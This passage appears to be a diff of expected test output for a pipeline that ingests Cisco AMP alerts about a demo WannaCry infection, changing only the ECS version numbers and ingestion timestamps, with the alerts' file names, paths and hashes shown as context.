                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -308,7 +308,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -328,7 +328,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094021497Z",
+                "ingested": "2021-09-13T18:07:42.929470269Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -383,7 +383,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -403,7 +403,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094023420Z",
+                "ingested": "2021-09-13T18:07:42.929472180Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -460,7 +460,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -490,7 +490,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094025345Z",
+                "ingested": "2021-09-13T18:07:42.929474079Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814973\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -554,7 +554,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -586,7 +586,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094027258Z",
+                "ingested": "2021-09-13T18:07:42.929476066Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":120000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":1008,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -645,7 +645,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -675,7 +675,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094029167Z",
+                "ingested": "2021-09-13T18:07:42.929477971Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":73000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -730,7 +730,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -760,7 +760,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094031077Z",
+                "ingested": "2021-09-13T18:07:42.929479867Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":26000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814968\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -813,7 +813,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -833,7 +833,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094032961Z",
+                "ingested": "2021-09-13T18:07:42.929481750Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -884,7 +884,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -904,7 +904,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094035008Z",
+                "ingested": "2021-09-13T18:07:42.929483818Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -955,7 +955,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -975,7 +975,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094036925Z",
+                "ingested": "2021-09-13T18:07:42.929485735Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -1028,7 +1028,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -1058,7 +1058,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094038843Z",
+                "ingested": "2021-09-13T18:07:42.929487600Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":870000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229327140847671\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1124,7 +1124,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -1156,7 +1156,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094040732Z",
+                "ingested": "2021-09-13T18:07:42.929489505Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847666\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5748,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1224,7 +1224,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -1256,7 +1256,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094042624Z",
+                "ingested": "2021-09-13T18:07:42.929491390Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":667000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":4772,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1324,7 +1324,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -1354,7 +1354,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094044602Z",
+                "ingested": "2021-09-13T18:07:42.929493387Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":28000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229327140847656\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1424,7 +1424,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -1456,7 +1456,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:10.094046511Z",
+                "ingested": "2021-09-13T18:07:42.929495259Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229322845880000,\"timestamp\":1610635263,\"timestamp_nanoseconds\":950000000,\"date\":\"2021-01-14T14:41:03+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"s